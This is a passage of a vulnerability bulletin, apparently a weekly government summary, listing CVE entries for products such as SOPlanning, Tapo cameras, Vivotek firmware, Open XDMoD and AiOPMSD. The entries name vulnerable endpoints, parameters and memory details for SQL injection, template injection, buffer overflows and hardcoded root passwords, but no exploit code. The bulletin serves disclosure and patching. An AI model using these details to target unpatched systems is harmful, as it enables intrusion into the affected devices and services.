| Simple SA--Wirtualna Uczelnia | Server-Side Template Injection (SSTI) in Wirtualna Uczelnia allows an unauthenticated attacker to perform Remote Code Execution (RCE). In the endpoint redirectToUrl and parameter redirectUrlParameter, insufficient input validation permits injection of arbitrary template expressions that are executed on the server. Successful exploitation can allow an attacker to run remote commands, including establishing a reverse shell. This issue affects Wirtualna Uczelnia versions up to wu#2016.437.295#0#20260327_105545 | 2026-06-02 | not yet calculated | CVE-2026-34906 | https://cert.pl/posts/2026/06/CVE-2026-34906 https://simple.com.pl/branze/edukacyjna/ |
| Simple SA--Wirtualna Uczelnia | Wirtualna Uczelnia is vulnerable to Reflected Cross‑Site Scripting (XSS) due to insecure handling of the locale parameter across multiple endpoints. An attacker can craft a malicious URL with JavaScript embedded in the locale parameter and send it to a victim. When the victim opens the link, the injected script will be executed in their browser. This issue affects Wirtualna Uczelnia versions up to wu#2016.437.295#0#20260327_105545 | 2026-06-02 | not yet calculated | CVE-2026-34907 | https://cert.pl/posts/2026/06/CVE-2026-34906 https://simple.com.pl/branze/edukacyjna/ |
| Sony--PS4 | A privilege escalation vulnerability exists in PlayStation 4 firmware versions 13.00 through 13.02. The BD-J (Blu-ray Disc Java) sandbox can be escaped through a malformed JAR file. | 2026-06-02 | not yet calculated | CVE-2025-64390 | https://hackerone.com/reports/3452696 |
| SOPlanning--SOPlanning | SOPlanning does not enforce authorization for backup functionalities. An unauthenticated attacker can directly query backup-related endpoints and retrieve backup archives containing user databases with usernames and password hashes, as well as the config.csv file, which includes additional sensitive information. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40543 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored Cross-Site Scripting (XSS) via /process/upload_backup endpoint. An authenticated attacker with access to the backup functionality can upload a crafted ZIP archive containing a malicious user.csv file with embedded JavaScript. The injected code is executed in the victim's browser when a user clicks the Edit button for the malicious backup. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40544 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Reflected XSS via the taches parameter. An attacker can craft a malicious URL which, when opened by authenticated victim, results in arbitrary JavaScript execution in the victim's browser. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40545 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to SQL Injection across multiple endpoints and parameters. Attacker with low privileges can inject arbitrary SQL commands, potentially gaining full control over the database. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40546 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Path Traversal in backup endpoints. Authenticated remote attacker is able to exploit a vulnerable endpoint and construct payloads that allow reading and executing files previously added through the backup functionality. Critically, due to CVE-2026-40543 (Missing Authorization), any backup file can be read by any (unauthorized) user. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40547 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning does not verify uploaded file extension. An authenticated attacker with access to the backup functionality can upload a crafted ZIP archive containing a legitimate user.csv file alongside a malicious file, which is extracted on the server. When combined with CVE-2026-40547 (Path Traversal), the malicious file (e.g., a PHP script) can be placed in a web-accessible location and executed via the browser. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40548 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Cross‑Site Request Forgery (CSRF) in groupe_save create, modify and delete endpoints. An attacker can craft a malicious website that, when visited by an authenticated user, automatically sends a forged GET or POST request to the application. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40549 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| sulu--sulu | Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.23 and 3.0.6, the password reset tokenand API key generation uses a weak cryptographical hash algorithm. This issue has been patched in versions 2.6.23 and 3.0.6. | 2026-06-01 | not yet calculated | CVE-2026-45701 | https://github.com/sulu/sulu/security/advisories/GHSA-7fv8-6pp7-6h85 https://github.com/sulu/sulu/releases/tag/2.6.23 https://github.com/sulu/sulu/releases/tag/3.0.6 |
| Symantec--PC Tools Internet Security | Improper access control in the PCTCore64.sys Windows kernel driver from PC Tools Internet Security allows user-mode processes to access the PCTCoreDriver WDM device interface and invoke privileged IOCTL handlers. A local attacker with the ability to access or load the affected driver can exploit this vulnerability to perform sensitive and privileged operations on the target system. | 2026-06-01 | not yet calculated | CVE-2026-8501 | https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language https://kb.cert.org/vuls/id/158530 |
| T3 Technology--CPE models | Incorrect access control in the web management interface of T3 Technology CPE models T625Pro v1.0.07, T6825G v1.0.03, and T7281 v1.0.03 allows unauthorized attackers to enable the Telnet service via sending a crafted request to a vulnerable CGI component. | 2026-06-04 | not yet calculated | CVE-2026-35904 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35904.md |
| T3 Technology--CPE models | T3 Technology CPE models T625Pro v1.0.07, T6825G v1.0.03, and T7281 v1.0.03 were discovered to contain a hardcoded password for root access under the "superadmin" account. | 2026-06-04 | not yet calculated | CVE-2026-35905 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35905.md |
| T3 Technology--CPE models | An undocumented debug CGI endpoint in T3 Technology CPE models T625Pro v1.0.07, T6825G v1.0.03 allows unauthenticated attackers to execute arbitrary system commands as root via supplying a crafted HTTP query string. | 2026-06-04 | not yet calculated | CVE-2026-35906 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35906.md |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.1, a path traversal vulnerability in the cache deletion endpoint allows authenticated API access to delete directories outside the configured cache path. This can cause arbitrary data loss and service disruption. Version 2.17.1 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-40605 | https://github.com/Tautulli/Tautulli/security/advisories/GHSA-fg46-xx7h-mhwr https://github.com/Tautulli/Tautulli/releases/tag/v2.17.1 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 are vulnerable to remote code execution via the newsletter custom template directory feature. On a fresh install before the setup wizard is completed, all management endpoints are completely unauthenticated. An attacker can create a newsletter agent, point the custom template directory to an attacker-controlled SMB share serving a malicious Mako template, and trigger execution via the newsletter render endpoint, all with zero credentials and no local access to the target system. On a completed install with credentials configured, the same chain is exploitable by any admin. Version 2.17.1 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-41065 | https://github.com/Tautulli/Tautulli/security/advisories/GHSA-68qx-mcf5-3jcp https://github.com/Tautulli/Tautulli/releases/tag/v2.17.1 |
| TEAM--Net::Async::Statsd::Client | Net::Async::Statsd::Client versions through 0.005 for Perl allow metric injections. The metric names are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. | 2026-06-03 | not yet calculated | CVE-2026-8722 | https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| TECNO Mobile--com.transsion.aiassistantlifestyle | Cross-Site Scripting (XSS) in GeniexWebView component in Transsion AI Assistant Lifestyle application (com.transsion.aiassistantlifestyle) all versions on Android allows remote attacker to execute arbitrary JavaScript in the WebView context via crafted web_action_data URL parameter. | 2026-06-02 | not yet calculated | CVE-2026-10510 | https://security.tecno.com/SRC/securityUpdates |
| Teltonika Networks--RUTOS | In Teltonika Networks RUTOS devices, running versions 7.22 through 7.23.2 and TSWOS devices running versions 1.09 through 1.09.1, due to unsafe calls to an eval function in rpc-profile, a vulnerability exists where a lower privileged user could perform command injection as the root user. | 2026-06-05 | not yet calculated | CVE-2026-8914 | https://www.teltonika-networks.com/support/security-centre |
| The Vinyl Cache Project--Vinyl Cache | In Vinyl Cache before 9.0.1 and Varnish Cache before 9.0.3, a deficiency in HTTP/2 request parsing can be exploited to launch a backend request desync attack (request smuggling), which in turn can be used for cache poisoning, authentication bypass, or possibly even information disclosure and manipulation. The attack vector only exists if HTTP/2 support is enabled by setting the feature parameter to contain +http2. HTTP/2 support is disabled by default. | 2026-06-03 | not yet calculated | CVE-2026-50052 | https://vinyl-cache.org/security/VSV00019.html |
| Thinkst Applied Research--Canarytokens | An HTML injection vulnerability in the notification email for "Slow Redirect" and "Cloned Website" Canarytokens exists in Thinkst Applied Research Canarytokens, enabling Interface Manipulation, Cross-Site Scripting (XSS) in emails clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c42435e before sha-bfda4df, from Git commit c42435e before bfda4df. | 2026-06-03 | not yet calculated | CVE-2026-10729 | https://github.com/thinkst/canarytokens/security/advisories/GHSA-hmjv-pj8j-8fg7 |
| TP-Link Systems Inc.--Tapo C200 v5 | TP-Link Tapo C200 v5 contains a stack-based buffer overflow flaw in RTSP authentication handling due to improper validation of Authorization header field lengths, which can be triggered by a crafted authentication request. Successful exploitation causes the affected RTSP core service process to crash and triggers an automatic system reboot, resulting in a denial of service (DoS) condition. This prevents legitimate users from accessing the camera's live video stream or management interface until the service restarts. | 2026-06-02 | not yet calculated | CVE-2026-1871 | https://www.tp-link.com/us/support/download/tapo-c200/v5/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c200/v5/#Firmware-Release-Notes https://www.tp-link.com/kr/support/download/tapo-c200/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5113/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | On Tapo C520WS v2, restricted accounts (for example, hub users) are intended to execute only a limited set of low‑sensitivity operations. Due to a logic flaw in the device's API authorization mechanism, an attacker can craft requests that leverage legitimate "method mapping" behavior to bypass whitelist restrictions, allowing restricted operations to be masked as permitted requests and executed. Successful exploitation may allow an attacker (with access to a restricted account) to execute unauthorized sensitive operations. Depending on the operation invoked, impact could include device resets, unintended configuration changes, or disruption of normal operation, leading to loss of availability and integrity of the device. | 2026-06-05 | not yet calculated | CVE-2026-34123 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A stack‑based buffer overflow vulnerability exists in Tapo C520WS v2 in the ONVIF CreateUsers service, where the device fails to properly validate the number of XML user nodes during request processing. An authenticated attacker can send a specially crafted ONVIF request containing an excessive number of user entries to trigger memory corruption. Successful exploitation may cause the ONVIF management service to terminate unexpectedly, resulting in a denial‑of‑service (DoS) condition that disrupts device configuration and management functions. | 2026-06-05 | not yet calculated | CVE-2026-6239 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A stack-based buffer overflow vulnerability exists in Tapo C520WS v2 in the ONVIF DeleteUsers service, due to insufficient boundary checks when handling multiple user deletion parameters. An authenticated attacker can send a crafted malicious request containing an excessive number of identifiers to overflow stack memory. Successful exploitation may result in a service crash or deadlock, leading to DoS affecting device management and monitoring functionality. | 2026-06-05 | not yet calculated | CVE-2026-6240 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | An authenticated format string vulnerability is present in the ONVIF AddScopes in Tapo C520WS v2, where user-controlled input is improperly passed to formatting functions without adequate sanitization. An attacker can inject format specifiers into ONVIF scope parameters to manipulate memory handling behavior. Successful exploitation may cause the ONVIF management service to crash, resulting in DoS condition that impacts normal device operation. | 2026-06-05 | not yet calculated | CVE-2026-6241 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | An authenticated format string vulnerability exists in the ONVIF Subscribe service in Tapo C520WS v2 due to improper handling of externally supplied parameters within formatting functions. An attacker may inject crafted format strings into event subscription requests or notification generation path to disrupt normal service execution. Successful exploitation may cause the event notification service to terminate unexpectedly, resulting in the loss of real-time alarm functionality and disruption of event notifications. | 2026-06-05 | not yet calculated | CVE-2026-6242 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A denial-of-service vulnerability exists in the RTSP server component of TP-Link Tapo C520WS v2 due to improper handling of syntactically invalid input. Crafted inputs can trigger a processing error, causing the RTSP service to enter non-responsive state. Successful exploitation may cause the RTSP in a denial-of-service condition. | 2026-06-05 | not yet calculated | CVE-2026-8714 | https://www.tp-link.com/us/support/download/tapo-c520ws/v2/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/v2/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5118/ |
| transmission--transmission | transmission through 4.1.1 was found to have a clickjacking weakness in the browser-facing WebUI and RPC response paths. | 2026-06-02 | not yet calculated | CVE-2026-38978 | https://github.com/transmission/transmission/pull/8747 https://github.com/transmission/transmission/commit/6b24c1c214ec6a44fa5fdff0ce7da6b16d8ecaa8 https://github.com/transmission/transmission/issues/8726 |
| Tychon--Tychon | Tychon includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory that may be controllable by an unprivileged user on Windows. Tychon contains a privileged service that uses this OpenSSL component. A user who can place a specially-crafted openssl.cnf file at an appropriate path may be able to achieve arbitrary code execution with SYSTEM privileges. | 2026-06-01 | not yet calculated | CVE-2022-4991 | https://www.kb.cert.org/vuls/id/730007 |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, a flaw in Open XDMoD's access control logic allows an attacker to submit a crafted HTTPS POST request that sets a session variable used for authorization decisions. If an installation of Open XDMoD includes the optional Job Performance (SUPReMM) module, an attacker could bypass intended data access restrictions and view other users' compute job efficiency metrics. All deployments of Open XDMoD prior to version 11.0.3 that contain the optional Job Performance (SUPReMM) module are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45776 | https://github.com/ubccr/xdmod/security/advisories/GHSA-3hfh-m242-8rmh https://github.com/ubccr/xdmod/releases/tag/v11.0.3-2 https://open.xdmod.org/security_patches/GHSA-3hfh-m242-8rmh-0_0_0-11_0_2.patch |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Starting in version 9.5.0 and prior to version 11.0.3, an attacker can remotely execute arbitrary system commands on the web server hosting Open XDMoD with the privileges of the web server process. This could allow an attacker to read or modify application data, alter system configuration, or disrupt service availability. All deployments of Open XDMoD versions 9.5.0 through 11.0.2 (inclusive) are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45777 | https://github.com/ubccr/xdmod/security/advisories/GHSA-29qm-7w4v-43fw https://github.com/ubccr/xdmod/releases/tag/v11.0.3-2 https://open.xdmod.org/security_patches/GHSA-29qm-7w4v-43fw-9_5_0-11_0_2.patch |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45778 | https://github.com/ubccr/xdmod/security/advisories/GHSA-3pv7-qvc3-h527 |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. An SQL injection vulnerability exists in Open XDMoD versions prior to 10.0.3 that allows an unauthenticated remote attacker to execute arbitrary SQL statements. Exploitation requires no authentication or user interaction and can result in complete compromise of the underlying database. All deployments of Open XDMoD prior to 10.0.3 are impacted. This issue was discovered on 2023-08-03 and patched on 2023-08-04. At this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 10.0.3 on 2023-08-04. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45779 | https://github.com/ubccr/xdmod/security/advisories/GHSA-r33r-6g3c-r992 https://github.com/ubccr/xdmod/releases/tag/v10.0.3 https://open.xdmod.org/security_patches/GHSA-r33r-6g3c-r992-0_0_0-8_6_0.patch https://open.xdmod.org/security_patches/GHSA-r33r-6g3c-r992-9_0_0-10_0_2.patch |
| Unknown--Really Simple Security | The Really Simple Security WordPress plugin before 9.5.10.1 does not enforce the second-factor challenge in two of its two-factor authentication REST endpoints, allowing an attacker who knows a user's password to obtain a WordPress authentication session for that user without completing the email OTP challenge. | 2026-06-02 | not yet calculated | CVE-2026-8293 | https://wpscan.com/vulnerability/1de69ef9-6226-4292-8e36-b331a37f043e/ |
| Verizon--VoLTE | SIP signaling stack in Verizon IMS (unspecified version) implements SIP signaling without IPsec integrity protection (missing Security-Client/Security-Server headers and ESP traffic), which allows an on-path attacker to compromise confidentiality, integrity, and authenticity of VoLTE signaling via passive monitoring and active manipulation of unsecured SIP messages over the radio and core network. | 2026-06-02 | not yet calculated | CVE-2026-10629 | https://www.3gpp.org/DynReport/33203.htm |
| vitejs--launch-editor | launch-editor allows users to open files with line numbers in editor from Node.js. Prior to version 2.9.0, due to the insufficient sanitization of the `file` argument in the `launchEditor`, an attacker can execute arbitrary commands on Windows by supplying a filename that contains special characters. This issue has been fixed in the `launch-editor` version 2.9.0, corresponding to vite version 5.4.9. | 2026-06-01 | not yet calculated | CVE-2024-52011 | https://github.com/vitejs/launch-editor/security/advisories/GHSA-c27g-q93r-2cwf https://github.com/vitejs/launch-editor/commit/971291e8a6a91226e1616c5c0ec85423d2d50a5e |
| VIVOTEK INC--FD8136-VVTK-0300a | Buffer Overflow vulnerability in VIVOTEK INC FD8136-VVTK-0300a allows a remote attacker to execute arbitrary code via the set_getparam.cgi component | 2026-06-02 | not yet calculated | CVE-2026-30649 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30649 |
| VIVOTEK INC--FD8136-VVTK-0300a | A post-authentication remote buffer overflow vulnerability exists in the /cgi-bin/admin/eventtask.cgi endpoint of the admin interface of Vivotek FD8136 cameras running firmware version FD8136-VVTK-0300a. This flaw allows an authenticated attacker to execute arbitrary code as root on the device remotely. | 2026-06-02 | not yet calculated | CVE-2026-30650 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30650 |
| VIVOTEK INC--FD8136-VVTK-0300a | A remote buffer overflow vulnerability exists in the /cgi-bin/dido/setdo.cgi endpoint of the admin interface of Vivotek FD8136 cameras running firmware version FD8136-VVTK-0300a. This flaw allows an authenticated attacker to execute arbitrary code as root on the device. | 2026-06-02 | not yet calculated | CVE-2026-30652 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-30652 |
| VIVOTEK INC--FD8136-VVTK-0300a | A stack-based buffer overflow in the motion_privacy.cgi binary in VIVOTEK FD8136 firmware FD8136-VVTK-0300a allows authenticated remote attackers to execute arbitrary code as root via an oversized n1 parameter in a POST request to the /cgi-bin/admin/setpm.cgi, /cgi-bin/admin/setmd.cgi, or /cgi-bin/admin/setmd_profile.cgi endpoint (all symlinks to the same binary). The parameter value is copied into a fixed-size 0xa4-byte stack buffer without bounds checking, overwriting the saved link register. The binary is compiled without stack canaries. | 2026-06-02 | not yet calculated | CVE-2026-35716 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35716 |
| VIVOTEK INC--FD8136-VVTK-0300a | A stack-based buffer overflow in the export_language.cgi binary in VIVOTEK FD8136 firmware FD8136-VVTK-0300a allows authenticated remote attackers to execute arbitrary code as root via a crafted POST request to the /cgi-bin/admin/export_language.cgi endpoint. The handler passes the attacker-controlled Content-Length value directly to fread() as the read size into a fixed-size 0x60-byte stack buffer, overwriting the saved link register. The binary is compiled without stack canaries. | 2026-06-02 | not yet calculated | CVE-2026-35717 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35717 |
| VIVOTEK INC--FD8136-VVTK-0300a | A path traversal vulnerability in the /admin/downloadMedias.cgi endpoint of VIVOTEK INC FD8136-VVTK firmware 0300a allows authenticated attackers to read any file on the device via sending a crafted request. | 2026-06-02 | not yet calculated | CVE-2026-35718 | http://vivotek.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2026-35718 |
| Wassimulator--CactusViewer v2.3.0 | A DLL hijacking vulnerability in Wassimulator (GitHub) CactusViewer v2.3.0 allows attackers to escalate privileges and execute arbitrary code via a crafted DLL. | 2026-06-03 | not yet calculated | CVE-2026-36574 | https://github.com/Wassimulator/CactusViewer/issues/65 https://github.com/Wassimulator/CactusViewer https://github.com/Wassimulator/CactusViewer/releases/download/v2.3.0/CactusViewer.exe https://github.com/openlabs/docker-wkhtmltopdf-aas/issues/36 |
| Yandex--Yandex Database | LDAP filter injection vulnerability in Yandex Database prior to 25.3.1.25 allows a remote attacker with valid LDAP credentials to bypass group membership checks resulting in unauthorized access to the database. | 2026-06-02 | not yet calculated | CVE-2026-10549 | https://ydb.tech/docs/ru/security-changelog |
| zephyrproject-rtos--Zephyr | An integer underflow in bt_mesh_sol_recv() in the Bluetooth Mesh solicitation handling (subsys/bluetooth/mesh/solicitation.c) leads to an out-of-bounds write. When CONFIG_BT_MESH_OD_PRIV_PROXY_SRV is enabled, the function parses solicitation PDUs from raw BLE advertising payloads. The AD parsing loop reads an attacker-controlled length byte (reported_len) and computes reported_len - 3 without checking that reported_len >= 3. When reported_len is less than 3, the subtraction is performed in signed int arithmetic and yields a negative value that bypasses the length guard and is then implicitly converted to a very large size_t when passed to net_buf_simple_pull_mem(). In builds without assertions, this wraps the buffer length and advances the data pointer far out of bounds, so subsequent reads dereference invalid memory. A nearby BLE device can trigger this with a non-connectable advertisement carrying a UUID16 AD structure and a crafted length byte, with no pairing or prior association required, potentially leading to denial of service or arbitrary code execution. | 2026-06-04 | not yet calculated | CVE-2026-5589 | https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-4pm9-4v7f-x6gr |
Vulnerability Summary for the Week of May 25, 2026
Posted on Monday June 01, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.0, MaxKB's webhook trigger endpoint (/api/trigger/v1/webhook/{trigger_id}) is accessible without authentication. The WebhookAuth class unconditionally returns (None, {}), which Django REST Framework interprets as successful authentication. Combined with optional per-trigger token verification and no backend enforcement of token requirements, any unauthenticated attacker who knows a valid trigger ID can invoke webhook triggers to execute their bound tasks. This vulnerability is fixed in 2.9.0. | 2026-05-26 | 7.5 | CVE-2026-44847 |
| AA-Team--Woocommerce Envato Affiliates | Missing Authorization vulnerability in AA-Team Woocommerce Envato Affiliates allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Woocommerce Envato Affiliates: from n/a through 1.2.1. | 2026-05-26 | 7.1 | CVE-2025-14361 |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was detected in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 3000WEBV2. Affected by this vulnerability is an unknown functionality of the file /SubstationWEBV2/app/..;/calc/getCalcmeterDetailDayListTree. Performing a manipulation of the argument sort results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9523 |
| Acrel Electrical--EEMS Enterprise Power Operation and Maintenance Cloud Platform | A vulnerability was determined in Acrel Electrical EEMS Enterprise Power Operation and Maintenance Cloud Platform 1.3.0. Affected by this issue is some unknown functionality of the file /SubstationWEBV2/app/..;/main/upfile. Executing a manipulation of the argument path can lead to path traversal. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-26 | 7.3 | CVE-2026-9550 |
| Agatasoft--Auto PingMaster | AgataSoft Auto PingMaster 1.5 contains a stack-based buffer overflow vulnerability in the Trace Route host name field that allows local attackers to execute arbitrary code by triggering structured exception handling. Attackers can craft a malicious ping.txt file with shellcode and jump instructions that overwrite the SEH handler pointer to achieve code execution when the file contents are pasted into the application. | 2026-05-25 | 8.4 | CVE-2018-25360 |
| agno-agi--agno | agno 2.6.5 contains a SQL injection vulnerability in the ClickHouse vector database backend that allows attackers to inject arbitrary SQL expressions by supplying malicious metadata keys and values to the delete_by_metadata() method. Attackers can exploit the unsafe f-string interpolation in clickhousedb.py to delete all rows, target specific rows, or extract information through error-based or blind SQL injection techniques. | 2026-05-29 | 8.3 | CVE-2026-10105 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'q' parameter. Attackers can send GET requests to search.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25413 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the actor parameter. Attackers can send GET requests to actor.php with crafted SQL payloads in the actor parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25414 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the director parameter. Attackers can send GET requests to director.php with crafted SQL payloads in the director parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25415 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the country parameter. Attackers can send GET requests to country.php with crafted SQL payloads in the country parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25416 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the quality parameter. Attackers can send GET requests to quality.php with crafted SQL payloads in the quality parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25417 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the year parameter. Attackers can send GET requests to year.php with crafted SQL payloads in the year parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25418 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the genre parameter. Attackers can send GET requests to genre.php with crafted SQL payloads in the genre parameter to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25419 |
| Aiopmsd--AiOPMSD Final | AiOPMSD Final 1.0.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to watch.php with crafted SQL payloads to extract sensitive database information including usernames, database names, and version details. | 2026-05-30 | 8.2 | CVE-2018-25420 |
